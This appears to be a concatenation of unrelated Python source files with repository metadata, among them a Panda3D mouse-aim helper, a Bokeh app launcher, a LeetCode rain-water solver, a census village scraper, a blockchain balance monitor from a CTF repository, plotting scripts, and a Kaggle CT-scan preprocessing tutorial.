self.keyMap[key] = value
return
# setKey: stores the given value in the given key within the key map dictionary.
def setupMouseAim(self):
self.CN = CollisionNode("RayCN")
self.cRay = CollisionRay()
self.CN.addSolid(self.cRay)
self.CN.setFromCollideMask(BitMask32.bit(8))
self.CN.setIntoCollideMask(BitMask32.allOff())
self.CN = base.camera.attachNewNode(self.CN)
# This creates new collision ray and puts it into a collision node.
# It's bitmask is set to 8, and it will be the only collider at bit 8.
self.aimPlaneCN = CollisionNode("aimPlaneCN")
self.aimPlane = CollisionPlane(Plane(Vec3(0,-1,0),
Point3(0,30,0)))
self.aimPlaneCN.addSolid(self.aimPlane)
self.aimPlaneCN.setFromCollideMask(BitMask32.allOff())
self.aimPlaneCN.setIntoCollideMask(BitMask32.bit(8))
self.aimPlaneCNP = base.camera.attachNewNode(self.aimPlaneCN)
# This creates an inverted collision sphere and puts it into a collision node.
# It's bitmask is set to 8, and it will be the only collidable object at bit 8.
# The collision node is attached to the camera so that it will move with the camera.
self.cTrav = CollisionTraverser()
# Creates a traverser to do collision testing
self.cHanQ = CollisionHandlerQueue()
# Creates a queue type handler to receive the collision event info.
self.cTrav.addCollider(self.CN, self.cHanQ)
# register the ray as a collider with the traverser,
# and register the handler queue as the handler to be used for the collisions.
def getMouseAim(self):
#This function takes a base node and checks that node and it's children for collision with the mouse ray. It also makes
#sure that the ray is positioned correctly and aimed at the mouse pointer.
if base.mouseWatcherNode.hasMouse():
#We must check to make sure the window has the mouse to prevent a crash error caused by accessing the mouse
#when it's not in the window.
mpos = base.mouseWatcherNode.getMouse()
#get the mouse position in the window
self.cRay.setFromLens(
base.camNode, mpos.getX(), mpos.getY())
#sets the ray's origin at the camera and directs it to shoot through the mouse cursor
self.cTrav.traverse(self.aimPlaneCNP)
#performs the collision checking pass
self.cHanQ.sortEntries()
# Sort the handler entries from nearest to farthest
if(self.cHanQ.getNumEntries() > 0):
entry = self.cHanQ.getEntry(0)
colPoint = entry.getSurfacePoint(render)
return(colPoint) | [
"[email protected]"
] | |
c6a4ab92e7015536946f440f0ffb7bc101b5570f | 214230d0796377be0bfdda286c2c389b92a19555 | /Codegate/2022 Quals/nft/monitor.py | 4922b3db2a6b542e3d5b30e586133eea5016c4fd | [
"Unlicense"
] | permissive | Qwaz/solved-hacking-problem | fa5ebfeb98ec979cf57dac1470a651199f2dc50d | cda0db4888322cce759a7362de88fff5cc79f599 | refs/heads/master | 2023-08-24T03:45:12.481496 | 2023-07-16T12:38:08 | 2023-07-16T12:38:08 | 49,208,719 | 100 | 28 | null | 2022-03-24T00:51:04 | 2016-01-07T14:18:18 | HTML | UTF-8 | Python | false | false | 604 | py | import json
import time
from account import *
from web3 import Web3
url = "http://13.124.97.208:8545"
provider = Web3(Web3.HTTPProvider(url))
with open("abi.json") as f:
nft_abi = json.load(f)
nft = provider.eth.contract(TARGET_ADDRESS, abi=nft_abi)
while True:
print(
{
"Balance": provider.eth.getBalance(SENDER_ADDRESS),
"Block number": provider.eth.block_number,
"My transactions": provider.eth.get_transaction_count(SENDER_ADDRESS),
"NFTs": nft.functions.getIDs().call({"from": SENDER_ADDRESS}),
}
)
time.sleep(3)
| [
"[email protected]"
] | |
dceb561fd9b18dfb85b1c5185bbee23385340b30 | cd9e707df25dd641163c0f89f33bdbcaa4f11a0c | /app/launcher.py | 35b960fefa33b4f16d990cbfd903bb0ea5170691 | [] | no_license | depixusgenome/libanalysis | 80e50953d4fad1654091bbaf59f181803671a242 | 3565db8c0e42d62c1adee1d664846227499f1302 | refs/heads/master | 2020-09-24T08:40:10.498554 | 2019-11-29T13:03:31 | 2019-11-29T13:03:31 | 225,716,577 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,795 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"Updates app manager so as to deal with controllers"
from contextlib import closing
from typing import Dict, Any
import sys
import asyncio
import socket
import random
from tornado.platform.asyncio import AsyncIOMainLoop
from bokeh.application import Application
from bokeh.application.handlers import FunctionHandler
from bokeh.server.server import Server
from bokeh.settings import settings
from bokeh.resources import DEFAULT_SERVER_PORT
from utils.logconfig import getLogger
from .scripting import orders
from .maincontrol import createview as _creator
LOGS = getLogger(__name__)
CAN_LOAD_JS = "."
class _FunctionHandler(FunctionHandler):
def __init__(self, view, stop = False):
self.__gotone = False
self.server = None
self.stoponnosession = stop
self.view = view
super().__init__(self.__start)
def on_session_created(self, session_context):
LOGS.debug('started session')
def on_session_destroyed(self, session_context):
LOGS.debug('destroyed session')
if not self.__gotone:
return
if self.server is not None and self.stoponnosession:
server, self.server = self.server, None
if len(server.get_sessions()) == 0:
LOGS.info('no more sessions -> stopping server')
server.stop()
@classmethod
def serveapplication(cls, view, **kwa):
"Launches a bokeh server"
# monkeypatch the js production: it's been done once & saved during compilation
cls.__monkeypatch_bokeh()
cls.__setport(kwa)
cls.__server_kwargs(kwa)
fcn = cls(view)
server = Server(Application(fcn), **kwa)
fcn.server = server
server.MainView = view
server.appfunction = fcn
return server
@classmethod
def launchflexx(cls, view, **kwa):
"Launches a bokeh server"
from webruntime import launch as _flexxlaunch
port = cls.__setport(kwa)
if isinstance(kwa.get('size', ()), list):
kwa['size'] = tuple(kwa['size'])
if isinstance(view, Server):
server = view
else:
server = cls.serveapplication(view, **kwa.pop('server', {}), port = port)
if kwa.get('runtime', 'app').endswith('app'):
cls.__monkeypatch_flexx(server)
view.MainControl.FLEXXAPP = _flexxlaunch('http://localhost:{}/'.format(port),
**kwa)
elif kwa.get('runtime', '') != 'none':
server.io_loop.add_callback(lambda: server.show("/"))
return server
@staticmethod
def __monkeypatch_flexx(server):
from webruntime._common import StreamReader
def run(self, __old__ = StreamReader.run):
"Stop the stream reader"
__old__(self)
server.stop()
StreamReader.run = run
@staticmethod
def __monkeypatch_bokeh():
# pylint: disable=import-outside-toplevel
from bokeh.core.properties import Seq
def from_json(self, json, models=None, __old__ = Seq.from_json):
"parse docstring"
if isinstance(json, dict):
json = {int(i): j for i, j in json.items()}
keys = sorted(json)
assert keys == list(range(max(json)+1))
json = [json[i] for i in keys]
return __old__(self, json, models = models)
Seq.from_json = from_json
def _stop(self, wait=True, __old__ = Server.stop):
if not getattr(self, '_stopped', False):
__old__(self, wait)
self.io_loop.stop()
Server.stop = _stop
@staticmethod
def __server_kwargs(kwa)-> Dict[str, Any]:
kwa.setdefault('sign_sessions', settings.sign_sessions())
kwa.setdefault('secret_key', settings.secret_key_bytes())
kwa.setdefault('generate_session_ids', True)
kwa.setdefault('use_index', True)
kwa.setdefault('redirect_root', True)
kwa.pop('runtime', None)
if isinstance(kwa.get('size', ()), list):
kwa['size'] = tuple(kwa['size'])
LOGS.debug("dynamic loads: %s", orders().dynloads())
LOGS.info(' http://localhost:%s', kwa['port'])
for mdl in orders().dynloads():
getattr(sys.modules.get(mdl, None), 'server', lambda x: None)(kwa)
return kwa
@staticmethod
def __setport(kwa):
if kwa.get('port', None) == 'random':
while True:
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:
sock.settimeout(2)
kwa['port'] = random.randint(2000, 8000)
if sock.connect_ex(("127.0.0.1", kwa['port'])) != 0:
break
else:
kwa['port'] = int(kwa.get('port', DEFAULT_SERVER_PORT))
return kwa['port']
def __onloaded(self):
if self.__gotone is False:
self.__gotone = True
LOGS.debug("GUI loaded")
def __start(self, doc):
doc.title = self.view.launchkwargs()['title']
orders().run(self.view, doc, self.__onloaded)
def setup(locs, #
creator = _creator,
defaultcontrols = tuple(),
defaultviews = tuple(),
):
"""
Populates a module with launch and serve functions for a given app context.
The context is created as follows, say in module `app.mycontext`:
```python
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"Updates app manager so as to deal with controllers"
from .launcher import setup
VIEWS = ('undo.UndoView', 'view.tasksview.TasksView',)
CONTROLS = ('control.taskcontrol.TaskController',
'taskstore.control',
'undo.UndoController')
setup(locals(), defaultcontrols = CONTROLS, defaultviews = VIEWS)
```
To launch a `webruntime` window displayng `myview.MyView`:
```python
from app.mycontext import launch
launch("myview.MyView")
```
See `app.toolbar` for an example which sets-up a toolbar above any view provided
as a argument.
"""
def _install():
asyncio.set_event_loop(asyncio.new_event_loop())
AsyncIOMainLoop().make_current()
def application(main,
creator = creator,
controls = defaultcontrols,
views = defaultviews):
"Creates a main view"
return creator(main, controls, views)
def serve(main,
creator = creator,
controls = defaultcontrols,
views = defaultviews,
apponly = False,
**kwa):
"Creates a browser app"
_install()
app = application(main, creator, controls, views)
if apponly:
return app
return _FunctionHandler.serveapplication(app, **kwa)
def launch(main,
creator = creator,
controls = defaultcontrols,
views = defaultviews,
apponly = False,
**kwa):
"Creates a desktop app"
_install()
app = application(main, creator, controls, views)
if apponly:
return app
return _FunctionHandler.launchflexx(app, **app.launchkwargs(**kwa))
locs.setdefault('application', application)
locs.setdefault('serve', serve)
locs.setdefault('launch', launch)
| [
"[email protected]"
] | |
150f246e7cffd52c4816f26c2ce92dcb16d63e69 | bfe6c95fa8a2aae3c3998bd59555583fed72900a | /trapRainWater.py | 90bf3bb91de30cedf3d4da4078594bb04fe33a9b | [] | no_license | zzz136454872/leetcode | f9534016388a1ba010599f4771c08a55748694b2 | b5ea6c21bff317884bdb3d7e873aa159b8c30215 | refs/heads/master | 2023-09-01T17:26:57.624117 | 2023-08-29T03:18:56 | 2023-08-29T03:18:56 | 240,464,565 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,026 | py | from heapq import heappop, heappush
from typing import List
class Solution:
def trapRainWater(self, heightMap: List[List[int]]) -> int:
m = len(heightMap)
n = len(heightMap[0])
heap = []
water = [[12345678] * n for i in range(m)]
for i in range(m):
heappush(heap, (heightMap[i][0], i, 0))
heappush(heap, (heightMap[i][n - 1], i, n - 1))
water[i][0] = 0
water[i][n - 1] = 0
for j in range(1, n - 1):
heappush(heap, (heightMap[0][j], 0, j))
heappush(heap, (heightMap[m - 1][j], m - 1, j))
water[0][j] = 0
water[m - 1][j] = 0
while len(heap) > 0:
now = heappop(heap)
nh = now[0]
if now[1] > 0:
if water[now[1] - 1][now[2]] + heightMap[now[1] - 1][
now[2]] > nh and water[now[1] - 1][now[2]] > 0:
water[now[1] - 1][now[2]] = max(
0, nh - heightMap[now[1] - 1][now[2]])
heappush(
heap,
(water[now[1] - 1][now[2]] +
heightMap[now[1] - 1][now[2]], now[1] - 1, now[2]))
if now[1] < m - 1:
if water[now[1] + 1][now[2]] + heightMap[now[1] + 1][
now[2]] > nh and water[now[1] + 1][now[2]] > 0:
water[now[1] + 1][now[2]] = max(
0, nh - heightMap[now[1] + 1][now[2]])
heappush(
heap,
(water[now[1] + 1][now[2]] +
heightMap[now[1] + 1][now[2]], now[1] + 1, now[2]))
if now[2] > 0:
if water[now[1]][now[2] - 1] + heightMap[now[1]][
now[2] - 1] > nh and water[now[1]][now[2] - 1] > 0:
water[now[1]][now[2] - 1] = max(
0, nh - heightMap[now[1]][now[2] - 1])
heappush(
heap,
(water[now[1]][now[2] - 1] +
heightMap[now[1]][now[2] - 1], now[1], now[2] - 1))
if now[2] < n - 1:
if water[now[1]][now[2] + 1] + heightMap[now[1]][
now[2] + 1] > nh and water[now[1]][now[2] + 1] > 0:
water[now[1]][now[2] + 1] = max(
0, nh - heightMap[now[1]][now[2] + 1])
heappush(
heap,
(water[now[1]][now[2] + 1] +
heightMap[now[1]][now[2] + 1], now[1], now[2] + 1))
return sum(sum(w) for w in water)
heightMap = [[1, 4, 3, 1, 3, 2], [3, 2, 1, 3, 2, 4], [2, 3, 3, 2, 3, 1]]
heightMap = [[3, 3, 3, 3, 3], [3, 2, 2, 2, 3], [3, 2, 1, 2, 3],
[3, 2, 2, 2, 3], [3, 3, 3, 3, 3]]
# heightMap=[[12,13,1,12],[13,4,13,12],[13,8,10,12],[12,13,12,12],[13,13,13,13]]
print(Solution().trapRainWater(heightMap))
| [
"[email protected]"
] | |
9c767873c7d94a6b7c04e62f428978616df72b28 | 3d19e1a316de4d6d96471c64332fff7acfaf1308 | /Users/P/pinakighosh/state18.py | 8edcffd229b35ac73c3e1e4c249b99569bd7806f | [] | no_license | BerilBBJ/scraperwiki-scraper-vault | 4e98837ac3b1cc3a3edb01b8954ed00f341c8fcc | 65ea6a943cc348a9caf3782b900b36446f7e137d | refs/heads/master | 2021-12-02T23:55:58.481210 | 2013-09-30T17:02:59 | 2013-09-30T17:02:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,650 | py | import scraperwiki
import mechanize # added by Usha
import re # added by Usha
import lxml.html
url="http://censusindia.gov.in/Census_Data_2001/Village_Directory/List_of_Villages/List_of_Villages_Alphabetical.aspx?cki=&State_Code=18"
import string
#create list of upper case alphabets
l=list(string.ascii_uppercase)
#create list 1-35
l1=list(range(1,36))
l2=[]
s_no=0
#convert numbers in l2 to string
for i in l1:
l2.append(str(i))
#append a 0 for single digit numbers
for i in range(10):
l2[i]='0'+l2[i]
state_count=0
c=1
data=[]
#run loop for all state and union territories
#while state_count<35:
while state_count<1:
#add state code to the url
#url1=url+l2[state_count]+"&SearchKey="
url1=url+"&SearchKey="
state_count+=1
count=0
l_c=0
#data=[]
row=[]
#run loop for alphabets
while count<26:
#while count<2:
#add search alphabet to the url
url2=url1+l[count]
# code added by Usha Nair
br = mechanize.Browser()
br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
response = br.open(url2)
VAR1 = response.read() #reads the source file for the web page
br.select_form(nr=0)
br.set_all_readonly(False)
mnext = re.search("""<a id="lnkShowAll" href="javascript:__doPostBack\('(.*?)','(.*?)'\)" style="font-family:Verdana;font-size:Smaller;">Show All""", VAR1)
if not mnext:
break
br["__EVENTTARGET"] = mnext.group(1)
br["__EVENTARGUMENT"] = mnext.group(2)
#br.find_control("btnSearch").disabled = True
response = br.submit()
VAR2 = response.read() # source code after submitting show all
print "response"
print response
print "VAR2"
print VAR2
# Usha Nair till here
#html = scraperwiki.scrape(url2)
#root = lxml.html.fromstring(html)
root = lxml.html.fromstring(VAR2)
count+=1
#select div where data exists
for el in root.cssselect("div#printarea td"):
#select appropriate table row
for el2 in el.cssselect("tr.GridAlternativeRows td"):
if l_c<4:
row.append(el2.text_content())
l_c+=1
else:
row.append(el2.text_content())
l_c=0
data.append(row)
#save to data base
scraperwiki.sqlite.save(unique_keys=["sl_no"],
data={"sl_no":s_no,"village_name":row[1],
"village_code":row[2],"Sub_district_Name":row[3],"District_Name":row[4]})
s_no+=1
row=[]
#select appropriate table row
for el2 in el.cssselect("tr.GridRows td"):
if l_c<4:
row.append(el2.text_content())
l_c+=1
else:
row.append(el2.text_content())
l_c=0
data.append(row)
#save to data base
scraperwiki.sqlite.save(unique_keys=["sl_no"],
data={"sl_no":s_no,"village_name":row[1],
"village_code":row[2],"Sub_district_Name":row[3],"District_Name":row[4]})
s_no+=1
row=[]
print "completed scrapping"
import scraperwiki
import mechanize # added by Usha
import re # added by Usha
import lxml.html
url="http://censusindia.gov.in/Census_Data_2001/Village_Directory/List_of_Villages/List_of_Villages_Alphabetical.aspx?cki=&State_Code=18"
import string
#create list of upper case alphabets
l=list(string.ascii_uppercase)
#create list 1-35
l1=list(range(1,36))
l2=[]
s_no=0
#convert numbers in l2 to string
for i in l1:
l2.append(str(i))
#append a 0 for single digit numbers
for i in range(10):
l2[i]='0'+l2[i]
state_count=0
c=1
data=[]
#run loop for all state and union territories
#while state_count<35:
while state_count<1:
#add state code to the url
#url1=url+l2[state_count]+"&SearchKey="
url1=url+"&SearchKey="
state_count+=1
count=0
l_c=0
#data=[]
row=[]
#run loop for alphabets
while count<26:
#while count<2:
#add search alphabet to the url
url2=url1+l[count]
# code added by Usha Nair
br = mechanize.Browser()
br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
response = br.open(url2)
VAR1 = response.read() #reads the source file for the web page
br.select_form(nr=0)
br.set_all_readonly(False)
mnext = re.search("""<a id="lnkShowAll" href="javascript:__doPostBack\('(.*?)','(.*?)'\)" style="font-family:Verdana;font-size:Smaller;">Show All""", VAR1)
if not mnext:
break
br["__EVENTTARGET"] = mnext.group(1)
br["__EVENTARGUMENT"] = mnext.group(2)
#br.find_control("btnSearch").disabled = True
response = br.submit()
VAR2 = response.read() # source code after submitting show all
print "response"
print response
print "VAR2"
print VAR2
# Usha Nair till here
#html = scraperwiki.scrape(url2)
#root = lxml.html.fromstring(html)
root = lxml.html.fromstring(VAR2)
count+=1
#select div where data exists
for el in root.cssselect("div#printarea td"):
#select appropriate table row
for el2 in el.cssselect("tr.GridAlternativeRows td"):
if l_c<4:
row.append(el2.text_content())
l_c+=1
else:
row.append(el2.text_content())
l_c=0
data.append(row)
#save to data base
scraperwiki.sqlite.save(unique_keys=["sl_no"],
data={"sl_no":s_no,"village_name":row[1],
"village_code":row[2],"Sub_district_Name":row[3],"District_Name":row[4]})
s_no+=1
row=[]
#select appropriate table row
for el2 in el.cssselect("tr.GridRows td"):
if l_c<4:
row.append(el2.text_content())
l_c+=1
else:
row.append(el2.text_content())
l_c=0
data.append(row)
#save to data base
scraperwiki.sqlite.save(unique_keys=["sl_no"],
data={"sl_no":s_no,"village_name":row[1],
"village_code":row[2],"Sub_district_Name":row[3],"District_Name":row[4]})
s_no+=1
row=[]
print "completed scrapping"
| [
"[email protected]"
] | |
20786461b76ff1f1326b20fb8848a9ae5e46f159 | 007e187c7d91702fc900b75f771a2470e1c091e1 | /tests/test_docker.py | 28b67c058bb792d1b640d3f6bcd6e4c2eb60caf8 | [] | no_license | bibi21000/janitoo_raspberry_i2c_ht16k33 | bb3d05bdb395a29862c4e6bbb57c5e369aaca1e8 | 3dbb883cdc3439fd164edff21ffc0a0da7ee160f | refs/heads/master | 2021-01-21T04:42:30.553870 | 2018-01-01T23:43:29 | 2018-01-01T23:43:29 | 55,532,142 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,899 | py | # -*- coding: utf-8 -*-
"""Unittests for Janitoo-common.
"""
__license__ = """
This file is part of Janitoo.
Janitoo is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Janitoo is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with Janitoo. If not, see <http://www.gnu.org/licenses/>.
"""
__author__ = 'Sébastien GALLET aka bibi21000'
__email__ = '[email protected]'
__copyright__ = "Copyright © 2013-2014-2015-2016 Sébastien GALLET aka bibi21000"
import warnings
warnings.filterwarnings("ignore")
import sys, os
import time
import unittest
import logging
import threading
import mock
import logging
from janitoo_nosetests import JNTTBase
from janitoo_nosetests.server import JNTTDockerServerCommon, JNTTDockerServer
from janitoo.runner import Runner, jnt_parse_args
from janitoo.server import JNTServer
from janitoo.utils import HADD_SEP, HADD
from janitoo_raspberry.server import PiServer
class TestRaspberryHT16K33Serser(JNTTDockerServer, JNTTDockerServerCommon):
"""Test the server
"""
loglevel = logging.DEBUG
path = '/tmp/janitoo_test'
broker_user = 'toto'
broker_password = 'toto'
server_class = PiServer
server_conf = "tests/data/janitoo_raspberry_i2c_ht16k33.conf"
hadds = [HADD%(144,0), HADD%(144,1)]
def test_040_server_start_no_error_in_log(self):
JNTTDockerServer.onlyDockerTest()
JNTTDockerServerCommon.minimal_040_server_start_reload_restart(self)
| [
"[email protected]"
] | |
ea84847a897152e526e739c1b328a0e72c02ca0e | 7fdac5209f86de756b9a8123a0911b70738eceeb | /pySDC/playgrounds/other/plots_overresolve_iter.py | 74944e603d1cf9c88e95f665c70286392dffcc72 | [
"BSD-2-Clause"
] | permissive | Parallel-in-Time/pySDC | edc66e399f6066effc5aaa376883e88e06b5332b | 1a51834bedffd4472e344bed28f4d766614b1537 | refs/heads/master | 2023-08-30T23:17:56.017934 | 2023-08-30T05:42:00 | 2023-08-30T05:42:00 | 26,165,004 | 30 | 31 | BSD-2-Clause | 2023-09-14T06:40:13 | 2014-11-04T10:56:53 | Jupyter Notebook | UTF-8 | Python | false | false | 2,099 | py | import pySDC.helpers.plot_helper as plt_helper
def beautify_plot(nprocs, fname):
plt_helper.plt.grid()
plt_helper.plt.legend(loc=2)
plt_helper.plt.xlabel('Number of parallel steps')
plt_helper.plt.ylabel('Theoretical speedup')
plt_helper.plt.xlim(0.9 * nprocs[0], 1.1 * nprocs[-1])
plt_helper.plt.ylim(0.25, 6.5)
plt_helper.plt.xticks(nprocs, nprocs)
plt_helper.plt.minorticks_off()
# save plot, beautify
plt_helper.savefig(fname)
def plot_data():
nprocs = [1, 2, 4, 8]
niter_overres = [9, 5, 11, 23]
alpha_overres = 1.0 / 4.0
speedup_overres = [
p / (p / niter_overres[0] * alpha_overres + k / niter_overres[0] * (1 + alpha_overres))
for p, k in zip(nprocs, niter_overres)
]
plt_helper.setup_mpl()
plt_helper.newfig(textwidth=238.96, scale=1.0)
plt_helper.plt.semilogx(
nprocs,
speedup_overres,
color='orange',
marker='o',
markersize=6,
label=r'$Nx_\mathcal{F}=512, \alpha=\frac{1}{4}$',
)
beautify_plot(nprocs, 'fool_speedup_overres_iter')
niter_wellres_1 = [9, 11, 16, 28]
alpha_wellres_1 = 1.0 / 4.0
speedup_wellres_1 = [
p / (p / niter_wellres_1[0] * alpha_wellres_1 + k / niter_wellres_1[0] * (1 + alpha_wellres_1))
for p, k in zip(nprocs, niter_wellres_1)
]
niter_wellres_2 = [9, 11, 16, 29]
alpha_wellres_2 = 1.0 / 2.0
speedup_wellres_2 = [
p / (p / niter_wellres_2[0] * alpha_wellres_2 + k / niter_wellres_2[0] * (1 + alpha_wellres_2))
for p, k in zip(nprocs, niter_wellres_2)
]
plt_helper.setup_mpl()
plt_helper.newfig(textwidth=238.96, scale=1.0)
plt_helper.plt.semilogx(
nprocs, speedup_wellres_1, color='r', marker='d', markersize=6, label=r'$Nx_\mathcal{F}=32, \alpha=\frac{1}{4}$'
)
plt_helper.plt.semilogx(
nprocs, speedup_wellres_2, color='b', marker='s', markersize=6, label=r'$Nx_\mathcal{F}=32, \alpha=\frac{1}{2}$'
)
beautify_plot(nprocs, 'fool_speedup_wellres_iter')
if __name__ == '__main__':
plot_data()
| [
"[email protected]"
] | |
76359312a5bbde79e5804a8ff7620d844d4189e4 | ebacefb163f31b3dd43f15ebdc91c5b76f6b703b | /lib/github/tasks.py | c6dd31a374dbbdae389ee01476928217efdc4fde | [
"MIT"
] | permissive | xyzlat/django-htk | a0180d3104c7e716cb07e075408acc14702abbc2 | 051256698ce7a593a8a9365c36ad9d265c6e0d80 | refs/heads/master | 2023-04-29T18:48:23.205203 | 2021-05-22T04:15:13 | 2021-05-22T04:15:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,373 | py | # HTK Imports
from htk.constants.time import (
BUSINESS_HOURS_START,
ISOWEEKDAY_WEEKDAYS,
MORNING_HOURS_END,
)
from htk.tasks import BaseTask
from htk.utils.text.transformers import get_symbols
# isort: off
class GitHubReminderTask(BaseTask):
def __init__(self):
from htk.lib.github.cachekeys import GitHubReminderCooldown
super(GitHubReminderTask, self).__init__(cooldown_class=GitHubReminderCooldown)
def has_cooldown(self, user):
_has_cooldown = super(GitHubReminderTask, self).has_cooldown(user)
#_has_cooldown = False
return _has_cooldown
def get_users(self):
import htk.apps.accounts.filters as _filters
from htk.apps.accounts.utils.lookup import get_users_with_attribute_value
users = get_users_with_attribute_value('github_reminders', True, as_bool=True)
users = _filters.users_currently_at_local_time(users, BUSINESS_HOURS_START, MORNING_HOURS_END, isoweekdays=ISOWEEKDAY_WEEKDAYS)
return users
def execute(self, user):
now = user.profile.get_local_time()
valid_chars = 'A-Za-z0-9_\-/'
github_organizations = get_symbols(
user.profile.get_attribute('github_organizations') or '',
valid_chars=valid_chars
)
github_repositories = get_symbols(
user.profile.get_attribute('github_repositories') or '',
valid_chars=valid_chars
)
self.send_github_reminders(
user,
organizations=github_organizations,
repositories=github_repositories
)
def send_github_reminders(self, user, organizations=None, repositories=None):
github_access_token = user.profile.get_attribute('github_access_token')
slack_webhook_url = user.profile.get_attribute('slack_webhook_url')
slack_channel = user.profile.get_attribute('github_reminders_slack_channel')
mention_here = user.profile.get_attribute('github_reminders_slack_mention_here')
from htk.lib.github.bots import GitHubReminderSlackBot
bot = GitHubReminderSlackBot(
slack_webhook_url,
slack_channel,
github_access_token,
organizations=organizations,
repositories=repositories,
mention_here=mention_here
)
bot.remind_pull_requests()
| [
"[email protected]"
] | |
df817cfce618305f6504307136b261cf76332d27 | 6d8915634102167d7515648e792a692a405dadc0 | /documentation/Tutorial_Modules/Machine_Learning_and_Feature_Extraction_Tutorial/Preprocessing_Tutorial/Kaggle_Preprocessing.py | e129f02cd48840985c5bbbcb06a3de5932425d5f | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | LiaoPan/qtim_tools | 6b2e43563c74ef9f6a29fd924d2d2bde0d97768a | 92bd15ec7a81c5eda70d11a015f74538f3c41e22 | refs/heads/master | 2020-04-02T05:31:56.851236 | 2018-09-24T16:10:50 | 2018-09-24T16:10:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,181 | py |
# coding: utf-8
# # Prerequisites
#
# Welcome to class!
#
# The following tutorial was written by Guido Zuidhoff, and can be seen as originally published at https://www.kaggle.com/gzuidhof/data-science-bowl-2017/full-preprocessing-tutorial/discussion. It is being rehosted at https://github.com/QTIM-Lab/qtim_tools/tree/master/documentation/iPython_Tutorials. It discusses some of the most common pre-processing steps one can take before feeding medical imaging data into a neural network or other deep learning algorithm.
#
# You can run the code yourself a few different ways:
#
# A) You can download this folder from Github, and then copy and paste the code segments below into your own python interpreter.
#
# B) You can SSH to our class server at 155.52.190.4, and run some of the code at the following path:
#
# C) You can install Jupyter Notebook, and viewer for iPython notebooks, and then use it to run this code inline after downloading it from Github. To do this, enter the command "pip install jupyter" into your command line. If installed successfully, you can use the "jupyter notebook" command in the folder where you downloaded your data.
#
# You may need to install some additional python packages if running this code locally. Particularly, Anaconda does not come with the package "pydicom", which is necessary to run this code. Install it with the command line "pip install pydicom."
#
# ***
# ## Introduction
#
# Working with these files can be a challenge, especially given their heterogeneous nature. Some preprocessing is required before they are ready for consumption by your CNN.
#
# Fortunately, I participated in the LUNA16 competition as part of a university course on computer aided diagnosis, so I have some experience working with these files. At this moment we top the leaderboard there :)
#
# **This tutorial aims to provide a comprehensive overview of useful steps to take before the data hits your ConvNet/other ML method.**
#
# What we will cover:
#
# * **Loading the DICOM files**, and adding missing metadata
# * **Converting the pixel values to *Hounsfield Units (HU)***, and what tissue these unit values correspond to
# * **Resampling** to an isomorphic resolution to remove variance in scanner resolution.
# * **3D plotting**, visualization is very useful to see what we are doing.
# * **Lung segmentation**
# * **Normalization** that makes sense.
# * **Zero centering** the scans.
#
#
# ---
#
# Before we start, let's import some packages and determine the available patients.
# In[1]:
# Only use this line if displaying in an iPython notebook.
# get_ipython().magic(u'matplotlib inline')
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
import dicom
import os
import scipy.ndimage
import matplotlib.pyplot as plt
from skimage import measure, morphology
from mpl_toolkits.mplot3d.art3d import Poly3DCollection
# Some constants
INPUT_FOLDER = './sample_images/'
patients = os.listdir(INPUT_FOLDER)
patients.sort()
# # Loading the files
# Dicom is the de-facto file standard in medical imaging. This is my first time working with it, but it seems to be fairly straight-forward. These files contain a lot of metadata (such as the pixel size, so how long one pixel is in every dimension in the real world).
#
# This pixel size/coarseness of the scan differs from scan to scan (e.g. the distance between slices may differ), which can hurt performance of CNN approaches. We can deal with this by isomorphic resampling, which we will do later.
#
# Below is code to load a scan, which consists of multiple slices, which we simply save in a Python list. Every folder in the dataset is one scan (so one patient). One metadata field is missing, the pixel size in the Z direction, which is the slice thickness. Fortunately we can infer this, and we add this to the metadata.
# In[2]:
# Load the scans in given folder path
def load_scan(path):
slices = [dicom.read_file(path + '/' + s) for s in os.listdir(path)]
slices.sort(key = lambda x: int(x.ImagePositionPatient[2]))
try:
slice_thickness = np.abs(slices[0].ImagePositionPatient[2] - slices[1].ImagePositionPatient[2])
except:
slice_thickness = np.abs(slices[0].SliceLocation - slices[1].SliceLocation)
for s in slices:
s.SliceThickness = slice_thickness
return slices
# The unit of measurement in CT scans is the **Hounsfield Unit (HU)**, which is a measure of radiodensity. CT scanners are carefully calibrated to accurately measure this. From Wikipedia:
#
# ![HU examples][1]
#
# By default however, the returned values are not in this unit. Let's fix this.
#
# Some scanners have cylindrical scanning bounds, but the output image is square. The pixels that fall outside of these bounds get the fixed value -2000. The first step is setting these values to 0, which currently corresponds to air. Next, let's go back to HU units, by multiplying with the rescale slope and adding the intercept (which are conveniently stored in the metadata of the scans!).
#
# [1]: http://i.imgur.com/4rlyReh.png
# In[3]:
def get_pixels_hu(slices):
image = np.stack([s.pixel_array for s in slices])
# Convert to int16 (from sometimes int16),
# should be possible as values should always be low enough (<32k)
image = image.astype(np.int16)
# Set outside-of-scan pixels to 0
# The intercept is usually -1024, so air is approximately 0
image[image == -2000] = 0
# Convert to Hounsfield units (HU)
for slice_number in range(len(slices)):
intercept = slices[slice_number].RescaleIntercept
slope = slices[slice_number].RescaleSlope
if slope != 1:
image[slice_number] = slope * image[slice_number].astype(np.float64)
image[slice_number] = image[slice_number].astype(np.int16)
image[slice_number] += np.int16(intercept)
return np.array(image, dtype=np.int16)
# Let's take a look at one of the patients.
# In[4]:
